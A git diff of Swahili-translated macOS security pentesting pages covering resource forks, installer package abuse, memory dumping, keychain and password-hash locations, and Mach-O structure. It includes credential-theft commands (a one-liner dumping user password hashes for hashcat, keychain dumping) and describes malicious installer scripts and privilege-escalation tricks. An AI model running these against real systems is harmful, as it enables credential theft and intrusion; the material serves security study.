- `com.apple.cprotect`: \*OS: Takwimu za usimbaji fiche wa faili (III/11)
- `com.apple.installd.*`: \*OS: Metadata inayotumika na installd, mfano, `installType`, `uniqueInstallID`
### Resource Forks | macOS ADS
### Rasilimali za Forks | macOS ADS
Hii ni njia ya kupata **Mito Mbadala ya Takwimu katika Mashine za MacOS**. Unaweza kuhifadhi maudhui ndani ya sifa iliyopanuliwa inayoitwa **com.apple.ResourceFork** ndani ya faili kwa kuihifadhi katika **file/..namedfork/rsrc**.
```bash
@ -207,7 +207,7 @@ com.apple.ResourceFork: Hello Mac ADS
ls -l a.txt #The file length is still q
-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt
```
Unaweza **kupata faili zote zinazokuwa na sifa hii ya ziada** kwa:
Unaweza **kupata faili zote zinazo na sifa hii ya ziada** kwa:
```bash
find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
```
@ -237,7 +237,7 @@ macos-memory-dumping.md
## Risk Category Files Mac OS
Direktori `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` ndiko ambapo taarifa kuhusu **hatari inayohusiana na nyongeza tofauti za faili inahifadhiwa**. Direktori hii inagawanya faili katika viwango mbalimbali vya hatari, ikishawishi jinsi Safari inavyoshughulikia faili hizi wakati wa kupakua. Kategoria ni kama ifuatavyo:
Direktori `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` ndiyo mahali ambapo taarifa kuhusu **hatari inayohusiana na nyongeza tofauti za faili inahifadhiwa**. Direktori hii inagawanya faili katika viwango mbalimbali vya hatari, ikishawishi jinsi Safari inavyoshughulikia faili hizi wakati wa kupakua. Kategoria ni kama ifuatavyo:
- **LSRiskCategorySafe**: Faili katika kategoria hii zinachukuliwa kuwa **salama kabisa**. Safari itafungua faili hizi moja kwa moja baada ya kupakuliwa.
- **LSRiskCategoryNeutral**: Faili hizi hazina onyo lolote na **hazifunguliwi moja kwa moja** na Safari.
@ -251,7 +251,7 @@ Direktori `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/Syst
- **`/private/var/log/asl/*.asl`**: Hizi ni Apple System Logs ambazo zinaweza kuwa na taarifa za kuvutia.
- **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Inahifadhi faili na programu zilizofikiwa hivi karibuni kupitia "Finder".
- **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Inahifadhi vitu vya kuzindua wakati wa kuanzisha mfumo.
- **`$HOME/Library/Logs/DiskUtility.log`**: Faili ya kumbukumbu ya programu ya DiskUtility (taarifa kuhusu diski, ikiwa ni pamoja na USB).
- **`$HOME/Library/Logs/DiskUtility.log`**: Faili ya kumbukumbu kwa App ya DiskUtility (taarifa kuhusu diski, ikiwa ni pamoja na USB).
- **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Taarifa kuhusu maeneo ya upatikanaji wa wireless.
- **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: Orodha ya daemons zilizozimwa.

22
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
View File

@ -6,7 +6,7 @@
Kifurushi cha **installer** cha macOS (pia kinachojulikana kama faili `.pkg`) ni muundo wa faili unaotumiwa na macOS ku **distribute software**. Faili hizi ni kama **sanduku linaloshikilia kila kitu ambacho kipande cha software** kinahitaji ili kufunga na kufanya kazi ipasavyo.
Faili la kifurushi lenyewe ni archive inayoshikilia **hifadhi ya faili na directories ambazo zitawekwa kwenye kompyuta ya lengo**. Inaweza pia kujumuisha **scripts** za kutekeleza kazi kabla na baada ya ufungaji, kama vile kuandaa faili za usanidi au kusafisha toleo za zamani za software.
Faili la kifurushi lenyewe ni archive inayoshikilia **hifadhi ya faili na directories ambazo zitawekwa kwenye kompyuta ya lengo**. Pia linaweza kujumuisha **scripts** za kutekeleza kazi kabla na baada ya ufungaji, kama vile kuandaa faili za usanidi au kusafisha toleo za zamani za software.
### Hierarchy
@ -32,14 +32,14 @@ xar -xf "/path/to/package.pkg"
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
```
Ili kuona maudhui ya installer bila kuyakandamiza kwa mikono, unaweza pia kutumia zana ya bure [**Suspicious Package**](https://mothersruin.com/software/SuspiciousPackage/).
Ili kuona maudhui ya mfunguo bila kuyakandamiza kwa mikono, unaweza pia kutumia zana ya bure [**Suspicious Package**](https://mothersruin.com/software/SuspiciousPackage/).
## Taarifa za Msingi za DMG
Faili za DMG, au Picha za Disk za Apple, ni muundo wa faili unaotumiwa na macOS ya Apple kwa picha za diski. Faili ya DMG kimsingi ni **picha ya diski inayoweza kuunganishwa** (ina mfumo wake wa faili) ambayo ina data ya block mbichi ambayo mara nyingi imepandishwa na wakati mwingine imefungwa. Unapofungua faili ya DMG, macOS **inaunganisha kama vile ilikuwa diski halisi**, ikikuruhusu kufikia maudhui yake.
> [!CAUTION]
> Kumbuka kwamba **`.dmg`** installers zinasaidia **format nyingi sana** kwamba katika siku za nyuma baadhi yao zikiwa na udhaifu zilikuwa zikitumiwa kupata **utendaji wa msimbo wa kernel**.
> Kumbuka kwamba **`.dmg`** waunganishaji wanaunga mkono **format nyingi sana** kwamba katika siku za nyuma baadhi yao walikuwa na udhaifu na kutumiwa kupata **utendaji wa msimbo wa kernel**.
### Hifadhi
@ -49,7 +49,7 @@ Hifadhi ya faili ya DMG inaweza kuwa tofauti kulingana na maudhui. Hata hivyo, k
- Kiwango cha Juu: Hii ni mzizi wa picha ya diski. Mara nyingi ina programu na labda kiungo kwa folda ya Maombi.
- Programu (.app): Hii ni programu halisi. Katika macOS, programu kawaida ni kifurushi kinachojumuisha faili na folda nyingi zinazounda programu hiyo.
- Kiungo cha Maombi: Hii ni njia fupi kwa folda ya Maombi katika macOS. Kusudi la hii ni kukurahisishia kufunga programu. Unaweza kuvuta faili ya .app kwenye njia fupi hii ili kufunga programu.
- Kiungo cha Maombi: Hii ni njia fupi kwa folda ya Maombi katika macOS. Kusudi la hii ni kurahisisha wewe kufunga programu. Unaweza kuvuta faili ya .app kwenye njia fupi hii ili kufunga programu.
## Privesc kupitia matumizi ya pkg
@ -61,7 +61,7 @@ Ikiwa skripti ya kabla au baada ya ufungaji inatekelezwa kutoka **`/var/tmp/Inst
### AuthorizationExecuteWithPrivileges
Hii ni [kazi ya umma](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) ambayo waunganishaji na wasasishaji wengi wataita ili **kutekeleza kitu kama root**. Kazi hii inakubali **njia** ya **faili** ya **kutekeleza** kama parameter, hata hivyo, ikiwa mshambuliaji anaweza **kubadilisha** faili hii, ataweza **kutumia** utekelezaji wake na root ili **kupandisha mamlaka**.
Hii ni [kazi ya umma](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) ambayo waunganishaji na wasasishaji kadhaa wataita ili **kutekeleza kitu kama root**. Kazi hii inakubali **njia** ya **faili** ya **kutekeleza** kama parameter, hata hivyo, ikiwa mshambuliaji anaweza **kubadilisha** faili hii, ataweza **kutumia** utekelezaji wake na root ili **kupandisha mamlaka**.
```bash
# Breakpoint in the function to check wich file is loaded
(lldb) b AuthorizationExecuteWithPrivileges
@ -71,7 +71,7 @@ Kwa maelezo zaidi angalia hii hotuba: [https://www.youtube.com/watch?v=lTOItyjTT
### Utekelezaji kwa kupandisha
Ikiwa mfunguo unandika kwenye `/tmp/fixedname/bla/bla`, inawezekana **kuunda mount** juu ya `/tmp/fixedname` bila wamiliki ili uweze **kubadilisha faili yoyote wakati wa ufungaji** ili kutumia mchakato wa ufungaji.
Ikiwa mfunguo wa programu unaandika kwenye `/tmp/fixedname/bla/bla`, inawezekana **kuunda mount** juu ya `/tmp/fixedname` bila wamiliki ili uweze **kubadilisha faili yoyote wakati wa usakinishaji** ili kutumia mchakato wa usakinishaji.
Mfano wa hili ni **CVE-2021-26089** ambayo ilifanikiwa **kufuta script ya kawaida** ili kupata utekelezaji kama root. Kwa maelezo zaidi angalia hotuba: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
@ -79,15 +79,15 @@ Mfano wa hili ni **CVE-2021-26089** ambayo ilifanikiwa **kufuta script ya kawaid
### Payload Tupu
Inawezekana tu kuzalisha faili **`.pkg`** yenye **pre and post-install scripts** bila payload halisi isipokuwa malware ndani ya scripts.
Inawezekana tu kuzalisha faili **`.pkg`** yenye **scripts za kabla na baada ya usakinishaji** bila payload halisi isipokuwa malware ndani ya scripts.
### JS katika distribution xml
### JS katika xml ya Usambazaji
Inawezekana kuongeza **`<script>`** tags katika faili **distribution xml** ya kifurushi na hiyo code itatekelezwa na inaweza **kutekeleza amri** kwa kutumia **`system.run`**:
Inawezekana kuongeza **`<script>`** tags katika faili **xml ya usambazaji** ya kifurushi na hiyo code itatekelezwa na inaweza **kutekeleza amri** kwa kutumia **`system.run`**:
<figure><img src="../../../images/image (1043).png" alt=""><figcaption></figcaption></figure>
### Mfunguo wa Nyuma
### Mfunguo wa Programu wa Nyuma
Mfunguo mbaya ukitumia script na JS code ndani ya dist.xml
```bash
@ -152,7 +152,7 @@ productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pk
```
## Marejeo
- [**DEF CON 27 - Kufungua Pkgs Kuangalia Ndani ya Macos Installer Packages na Mapungufu ya Usalama ya Kawaida**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**DEF CON 27 - Kufungua Pkgs Kuangalia Ndani ya Macos Installer Packages na Mapungufu ya Kawaida ya Usalama**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**OBTS v4.0: "Ulimwengu wa Kijani wa macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
- [**DEF CON 27 - Kufungua Pkgs Kuangalia Ndani ya MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
- [https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages)

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View File

@ -10,7 +10,7 @@ Faili za kubadilishana, kama `/private/var/vm/swapfile0`, hutumikia kama **cache
### Hibernate Image
Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya hibernation**. **Data kutoka kwenye kumbukumbu huhifadhiwa katika faili hii wakati OS X inahibernation**. Wakati kompyuta inapoamka, mfumo unapata data ya kumbukumbu kutoka faili hii, ikiruhusu mtumiaji kuendelea mahali alipoacha.
Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kwenye kumbukumbu huhifadhiwa katika faili hii wakati OS X inalala**. Wakati kompyuta inapoamka, mfumo unapata data ya kumbukumbu kutoka faili hii, ikiruhusu mtumiaji kuendelea mahali alipoacha.
Inafaa kutaja kwamba kwenye mifumo ya kisasa ya MacOS, faili hii kwa kawaida imefungwa kwa sababu za usalama, na kufanya urejeleaji kuwa mgumu.
@ -18,13 +18,13 @@ Inafaa kutaja kwamba kwenye mifumo ya kisasa ya MacOS, faili hii kwa kawaida ime
### Memory Pressure Logs
Faili nyingine muhimu inayohusiana na kumbukumbu katika mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina maelezo ya kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinweza kuwa na manufaa hasa katika kutambua matatizo yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
Faili nyingine muhimu inayohusiana na kumbukumbu katika mifumo ya MacOS ni **kumbukumbu za shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina maelezo ya kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinweza kuwa na manufaa hasa kwa kutambua matatizo yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
## Dumping memory with osxpmem
Ili kutupa kumbukumbu katika mashine ya MacOS unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
**Kumbuka**: Maagizo yafuatayo yatatumika tu kwa Macs zenye usanifu wa Intel. Chombo hiki sasa kimehifadhiwa na toleo la mwisho lilikuwa mwaka wa 2017. Binary iliyopakuliwa kwa kutumia maagizo hapa chini inalenga chips za Intel kwani Apple Silicon haikuwapo mwaka wa 2017. Inaweza kuwa inawezekana kukusanya binary kwa usanifu wa arm64 lakini itabidi ujaribu mwenyewe.
**Kumbuka**: Maagizo yafuatayo yatatumika tu kwa Macs zenye usanifu wa Intel. Chombo hiki sasa kimehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Binary iliyopakuliwa kwa kutumia maagizo hapa chini inalenga chips za Intel kwani Apple Silicon haikuwapo mwaka 2017. Inaweza kuwa inawezekana kukusanya binary kwa usanifu wa arm64 lakini itabidi ujaribu mwenyewe.
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem

34
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
View File

@ -7,13 +7,13 @@
### Shadow Passwords
Shadow password inahifadhiwa pamoja na usanidi wa mtumiaji katika plists zilizoko **`/var/db/dslocal/nodes/Default/users/`**.\
Mfuatano ufuatao unaweza kutumika kutoa **maelezo yote kuhusu watumiaji** (ikiwemo taarifa za hash):
Mfuatano huu wa moja unaweza kutumika kutoa **habari zote kuhusu watumiaji** (ikiwemo taarifa za hash):
```bash
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
```
[**Scripts kama hii**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) au [**hii**](https://github.com/octomagon/davegrohl.git) zinaweza kutumika kubadilisha hash kuwa **hashcat** **format**.
Mstari mbadala mmoja ambao utaondoa creds za akaunti zote zisizo za huduma katika format ya hashcat `-m 7100` (macOS PBKDF2-SHA512):
Mstari mbadala mmoja ambao utatoa creds za akaunti zote zisizo za huduma katika format ya hashcat `-m 7100` (macOS PBKDF2-SHA512):
```bash
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
```
@ -25,7 +25,7 @@ Faili hii inatumika **tu** wakati mfumo unafanya kazi katika **mode ya mtumiaji
### Keychain Dump
Kumbuka kwamba unapokuwa unatumia binary ya usalama ili **kutoa nywila zilizotafsiriwa**, maelekezo kadhaa yatauliza mtumiaji kuruhusu operesheni hii.
Kumbuka kwamba unapokuwa unatumia binary ya usalama **kudondosha nywila zilizotafsiriwa**, maelekezo kadhaa yatauliza mtumiaji kuruhusu operesheni hii.
```bash
#security
security dump-trust-settings [-s] [-d] #List certificates
@ -43,28 +43,28 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
Zana inayoitwa **keychaindump** imeandaliwa kutoa nywila kutoka kwa keychains za macOS, lakini inakabiliwa na vikwazo katika matoleo mapya ya macOS kama Big Sur, kama ilivyoelezwa katika [majadiliano](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760). Matumizi ya **keychaindump** yanahitaji mshambuliaji kupata ufikiaji na kupandisha mamlaka hadi **root**. Zana hii inatumia ukweli kwamba keychain imefunguliwa kwa default wakati wa kuingia kwa mtumiaji kwa urahisi, ikiruhusu programu kufikia bila kuhitaji nywila ya mtumiaji mara kwa mara. Hata hivyo, ikiwa mtumiaji atachagua kufunga keychain yao baada ya kila matumizi, **keychaindump** inakuwa isiyo na ufanisi.
**Keychaindump** inafanya kazi kwa kulenga mchakato maalum unaoitwa **securityd**, ambao Apple inaelezea kama daemon wa idhini na operesheni za kificho, muhimu kwa kufikia keychain. Mchakato wa kutoa unajumuisha kutambua **Master Key** inayotokana na nywila ya kuingia ya mtumiaji. Key hii ni muhimu kwa kusoma faili ya keychain. Ili kupata **Master Key**, **keychaindump** inachanganua heap ya kumbukumbu ya **securityd** kwa kutumia amri ya `vmmap`, ikitafuta funguo zinazoweza kuwa ndani ya maeneo yaliyoashiriwa kama `MALLOC_TINY`. Amri ifuatayo inatumika kukagua maeneo haya ya kumbukumbu:
**Keychaindump** inafanya kazi kwa kulenga mchakato maalum unaoitwa **securityd**, ambayo Apple inaelezea kama daemon kwa ajili ya mamlaka na operesheni za kificho, muhimu kwa ufikiaji wa keychain. Mchakato wa kutoa nywila unahusisha kutambua **Master Key** inayotokana na nywila ya kuingia ya mtumiaji. Key hii ni muhimu kwa kusoma faili ya keychain. Ili kupata **Master Key**, **keychaindump** inachanganua kumbukumbu ya **securityd** kwa kutumia amri ya `vmmap`, ikitafuta funguo zinazoweza kuwa ndani ya maeneo yaliyoashiriwa kama `MALLOC_TINY`. Amri ifuatayo inatumika kukagua maeneo haya ya kumbukumbu:
```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY
```
Baada ya kubaini funguo kuu zinazoweza kuwa, **keychaindump** inatafuta kupitia makundi kwa mfano maalum (`0x0000000000000018`) unaoashiria mgombea wa funguo kuu. Hatua zaidi, ikiwa ni pamoja na kuondoa ufichuzi, zinahitajika ili kutumia funguo hii, kama ilivyoelezwa katika ms source code wa **keychaindump**. Wachambuzi wanaolenga eneo hili wanapaswa kuzingatia kwamba data muhimu ya kufichua funguo za keychain inahifadhiwa ndani ya kumbukumbu ya mchakato wa **securityd**. Mfano wa amri ya kuendesha **keychaindump** ni:
Baada ya kubaini funguo kuu zinazoweza, **keychaindump** inatafuta kupitia makundi kwa mfano maalum (`0x0000000000000018`) unaoashiria mgombea wa funguo kuu. Hatua zaidi, ikiwa ni pamoja na kuondoa ufichaji, zinahitajika kutumia funguo hii, kama ilivyoelezwa katika msimbo wa chanzo wa **keychaindump**. Wachambuzi wanaolenga eneo hili wanapaswa kuzingatia kwamba data muhimu ya kufichua funguo za keychain inahifadhiwa ndani ya kumbukumbu ya mchakato wa **securityd**. Mfano wa amri ya kuendesha **keychaindump** ni:
```bash
sudo ./keychaindump
```
### chainbreaker
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kutoa aina zifuatazo za taarifa kutoka kwa keychain ya OSX kwa njia ya forensically sound:
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kutoa aina zifuatazo za taarifa kutoka kwa OSX keychain kwa njia ya forensically sound:
- Nywila ya Keychain iliyohashwa, inayofaa kwa ajili ya kuvunja kwa kutumia [hashcat](https://hashcat.net/hashcat/) au [John the Ripper](https://www.openwall.com/john/)
- Nywila za Mtandao
- Nywila za Kawaida
- Nenosiri la Keychain lililohashwa, linalofaa kwa ajili ya kuvunja kwa kutumia [hashcat](https://hashcat.net/hashcat/) au [John the Ripper](https://www.openwall.com/john/)
- Nenosiri za Mtandao
- Nenosiri za Kawaida
- Funguo Binafsi
- Funguo za Umma
- Vyeti vya X509
- Maelezo Salama
- Nywila za Appleshare
- Nenosiri za Appleshare
Ikiwa kuna nywila ya kufungua keychain, funguo kuu iliyopatikana kwa kutumia [volafox](https://github.com/n0fate/volafox) au [volatility](https://github.com/volatilityfoundation/volatility), au faili ya kufungua kama SystemKey, Chainbreaker pia itatoa nywila za maandiko.
Ikiwa kuna nenosiri la kufungua keychain, funguo kuu iliyopatikana kwa kutumia [volafox](https://github.com/n0fate/volafox) au [volatility](https://github.com/volatilityfoundation/volatility), au faili ya kufungua kama SystemKey, Chainbreaker pia itatoa nenosiri za maandiko.
Bila moja ya hizi mbinu za kufungua Keychain, Chainbreaker itaonyesha taarifa nyingine zote zinazopatikana.
@ -129,7 +129,7 @@ sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
Unaweza kupata data za Notifications katika `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
Mengi ya habari za kuvutia yatakuwa katika **blob**. Hivyo utahitaji **kuchota** yaliyomo na **kubadilisha** kuwa **yanayoweza** **kusomwa** na binadamu au tumia **`strings`**. Ili kuyafikia unaweza kufanya:
Mengi ya habari za kuvutia yatakuwa katika **blob**. Hivyo utahitaji **kutoa** yaliyomo hayo na **kubadilisha** kuwa **yanayoweza** **kusomwa** na binadamu au tumia **`strings`**. Ili kuyafikia unaweza kufanya:
```bash
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
@ -145,7 +145,7 @@ for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.s
```
## Preferences
Katika programu za macOS, mapendeleo yako katika **`$HOME/Library/Preferences`** na katika iOS yako katika `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences`.
Katika programu za macOS, mapendeleo yanapatikana katika **`$HOME/Library/Preferences`** na katika iOS yanapatikana katika `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences`.
Katika macOS, zana ya cli **`defaults`** inaweza kutumika kubadilisha **faili za Mapendeleo**.
@ -191,11 +191,11 @@ Faili hii inatoa ruhusa kwa watumiaji maalum kwa UUID (na si uid) ili waweze kuf
### Notifications za Darwin
Daemoni kuu wa notifications ni **`/usr/sbin/notifyd`**. Ili kupokea notifications, wateja lazima wajisajili kupitia `com.apple.system.notification_center` Mach port (angalia kwa `sudo lsmp -p <pid notifyd>`). Daemoni inaweza kubadilishwa kwa kutumia faili `/etc/notify.conf`.
Daemoni kuu wa notifications ni **`/usr/sbin/notifyd`**. Ili kupokea notifications, wateja lazima wajisajili kupitia bandari ya Mach `com.apple.system.notification_center` (angalia kwa `sudo lsmp -p <pid notifyd>`). Daemoni inaweza kuundwa kwa kutumia faili `/etc/notify.conf`.
Majina yanayotumika kwa notifications ni alama za kipekee za DNS za kinyume na wakati notification inatumwa kwa moja yao, mteja(wateja) ambao wameonyesha wanaweza kushughulikia hiyo watapokea.
Inawezekana kutoa hali ya sasa (na kuona majina yote) kwa kutuma ishara SIGUSR2 kwa mchakato wa notifyd na kusoma faili iliyozalishwa: `/var/run/notifyd_<pid>.status`:
Inawezekana kutoa hali ya sasa (na kuona majina yote) kwa kutuma ishara SIGUSR2 kwa mchakato wa notifyd na kusoma faili lililotengenezwa: `/var/run/notifyd_<pid>.status`:
```bash
ps -ef | grep -i notifyd
0 376 1 0 15Mar24 ?? 27:40.97 /usr/sbin/notifyd
@ -213,11 +213,11 @@ common: com.apple.security.octagon.joined-with-bottle
```
### Kituo cha Arifa Kilichosambazwa
Kituo cha **Distributed Notification Center** ambacho faili lake kuu ni **`/usr/sbin/distnoted`**, ni njia nyingine ya kutuma arifa. Kinatoa huduma kadhaa za XPC na hufanya baadhi ya ukaguzi ili kujaribu kuthibitisha wateja.
**Kituo cha Arifa Kilichosambazwa** ambacho faili lake kuu ni **`/usr/sbin/distnoted`**, ni njia nyingine ya kutuma arifa. Kinatoa huduma kadhaa za XPC na hufanya baadhi ya ukaguzi kujaribu kuthibitisha wateja.
### Arifa za Apple Push (APN)
Katika kesi hii, programu zinaweza kujiandikisha kwa **topics**. Mteja atazalisha token kwa kuwasiliana na seva za Apple kupitia **`apsd`**.\
Katika kesi hii, programu zinaweza kujiandikisha kwa **mada**. Mteja atazalisha token kwa kuwasiliana na seva za Apple kupitia **`apsd`**.\
Kisha, watoa huduma, pia watakuwa wamezalisha token na wataweza kuungana na seva za Apple kutuma ujumbe kwa wateja. Ujumbe huu utapokelewa kwa ndani na **`apsd`** ambayo itapeleka arifa kwa programu inayosubiri hiyo.
Mipangilio iko katika `/Library/Preferences/com.apple.apsd.plist`.

58
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
View File

@ -4,7 +4,7 @@
## Basic Information
Mac OS binaries kwa kawaida zinakusanywa kama **universal binaries**. **Universal binary** inaweza **kuunga mkono usanifu nyingi katika faili moja**.
Mac OS binaries kawaida huandaliwa kama **universal binaries**. **Universal binary** inaweza **kuunga mkono usanifu nyingi katika faili moja**.
Binaries hizi zinafuata **Mach-O structure** ambayo kimsingi inajumuisha:
@ -22,7 +22,7 @@ Tafuta faili kwa: `mdfind fat.h | grep -i mach-o | grep -E "fat.h$"`
</strong><strong>#define FAT_CIGAM 0xbebafeca /* NXSwapLong(FAT_MAGIC) */
</strong>
struct fat_header {
<strong> uint32_t magic; /* FAT_MAGIC or FAT_MAGIC_64 */
<strong> uint32_t magic; /* FAT_MAGIC au FAT_MAGIC_64 */
</strong><strong> uint32_t nfat_arch; /* idadi ya structs zinazofuata */
</strong>};
@ -68,7 +68,7 @@ au kwa kutumia zana ya [Mach-O View](https://sourceforge.net/projects/machoview/
<figure><img src="../../../images/image (1094).png" alt=""><figcaption></figcaption></figure>
Kama unavyoweza kufikiria, kawaida **universal binary** iliyokusanywa kwa usanifu 2 **inaongeza ukubwa** wa moja iliyokusanywa kwa usanifu 1 tu.
Kama unavyoweza kufikiria, kawaida **universal binary** iliyoundwa kwa usanifu 2 **inaongeza ukubwa** wa moja iliyoundwa kwa usanifu 1 tu.
## **Mach-O Header**
@ -103,7 +103,7 @@ uint32_t reserved; /* reserved */
Kuna aina tofauti za faili, unaweza kuziona zikifafanuliwa katika [**kanuni ya chanzo kwa mfano hapa**](https://opensource.apple.com/source/xnu/xnu-2050.18.24/EXTERNAL_HEADERS/mach-o/loader.h). Aina muhimu zaidi ni:
- `MH_OBJECT`: Faili ya kitu inayoweza kuhamishwa (bidhaa za kati za uundaji, sio executable bado).
- `MH_OBJECT`: Faili ya kitu inayoweza kuhamishwa (bidhaa za kati za uundaji, bado si executable).
- `MH_EXECUTE`: Faili zinazoweza kutekelezwa.
- `MH_FVMLIB`: Faili ya maktaba ya VM iliyowekwa.
- `MH_CORE`: Mifumo ya Kanuni
@ -128,16 +128,16 @@ Au kutumia [Mach-O View](https://sourceforge.net/projects/machoview/):
Msimbo wa chanzo pia unafafanua bendera kadhaa muhimu kwa ajili ya kupakia maktaba:
- `MH_NOUNDEFS`: Hakuna marejeleo yasiyo na ufafanuzi (imeunganishwa kikamilifu)
- `MH_NOUNDEFS`: Hakuna marejeo yasiyo na ufafanuzi (imeunganishwa kikamilifu)
- `MH_DYLDLINK`: Kuunganisha Dyld
- `MH_PREBOUND`: Marejeleo ya dinamik yanayofungwa mapema.
- `MH_PREBOUND`: Marejeo ya dinamik yanayofungwa mapema.
- `MH_SPLIT_SEGS`: Faili inagawanya sehemu r/o na r/w.
- `MH_WEAK_DEFINES`: Binary ina alama dhaifu zilizofafanuliwa
- `MH_BINDS_TO_WEAK`: Binary inatumia alama dhaifu
- `MH_ALLOW_STACK_EXECUTION`: Fanya stack iweze kutekelezwa
- `MH_NO_REEXPORTED_DYLIBS`: Maktaba haina amri za LC_REEXPORT
- `MH_PIE`: Mtendaji Huru wa Nafasi
- `MH_HAS_TLV_DESCRIPTORS`: Kuna sehemu yenye vigezo vya nyuzi za ndani
- `MH_HAS_TLV_DESCRIPTORS`: Kuna sehemu yenye mabadiliko ya nyuzi za ndani
- `MH_NO_HEAP_EXECUTION`: Hakuna utekelezaji kwa kurasa za heap/data
- `MH_HAS_OBJC`: Binary ina sehemu za oBject-C
- `MH_SIM_SUPPORT`: Msaada wa simulator
@ -145,7 +145,7 @@ Msimbo wa chanzo pia unafafanua bendera kadhaa muhimu kwa ajili ya kupakia makta
## **Mach-O Load commands**
Muundo wa **faili katika kumbukumbu** umefafanuliwa hapa, ukielezea **mahali pa jedwali la alama**, muktadha wa nyuzi kuu wakati wa kuanza utekelezaji, na **maktaba zinazohitajika**. Maagizo yanatolewa kwa mzigo wa dinamik **(dyld)** kuhusu mchakato wa kupakia binary katika kumbukumbu.
Muundo wa **faili katika kumbukumbu** umeelezwa hapa, ukifafanua **mahali pa jedwali la alama**, muktadha wa nyuzi kuu wakati wa kuanza utekelezaji, na **maktaba zinazohitajika**. Maagizo yanatolewa kwa mzigo wa dinamik **(dyld)** kuhusu mchakato wa kupakia binary katika kumbukumbu.
Inatumia muundo wa **load_command**, uliofafanuliwa katika **`loader.h`**:
```objectivec
@ -159,13 +159,13 @@ Kuna aina **aina 50 tofauti za amri za kupakia** ambazo mfumo unashughulikia kwa
### **LC_SEGMENT/LC_SEGMENT_64**
> [!TIP]
> Kimsingi, aina hii ya Amri ya Kupakia inaelezea **jinsi ya kupakia \_\_TEXT** (kanuni inayoweza kutekelezwa) **na \_\_DATA** (data kwa ajili ya mchakato) **sehemu** kulingana na **offsets zilizotajwa katika sehemu ya Data** wakati faili ya binary inatekelezwa.
> Kimsingi, aina hii ya Amri ya Kupakia inaelezea **jinsi ya kupakia \_\_TEXT** (kanuni inayotekelezeka) **na \_\_DATA** (data kwa ajili ya mchakato) **sehemu** kulingana na **offsets zilizoonyeshwa katika sehemu ya Data** wakati binary inatekelezwa.
Amri hizi **zinaelezea sehemu** ambazo **zinapangwa** katika **nafasi ya kumbukumbu ya virtual** ya mchakato wakati inatekelezwa.
